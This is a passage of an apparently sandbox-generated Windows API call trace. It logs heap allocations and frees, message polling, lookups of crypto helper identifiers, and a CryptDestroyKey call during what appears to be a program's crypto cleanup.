RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.088] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0241.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0241.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.089] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0241.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0241.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51238, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.091] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.091] CryptDestroyKey (hKey=0xa87590) returned 1 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0241.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0241.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.093] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.093] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0241.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.094] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0241.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0241.094] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0241.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0241.094] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0241.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0241.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0241.202] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.202] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.202] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0241.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.203] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.203] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.203] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0241.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.204] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, 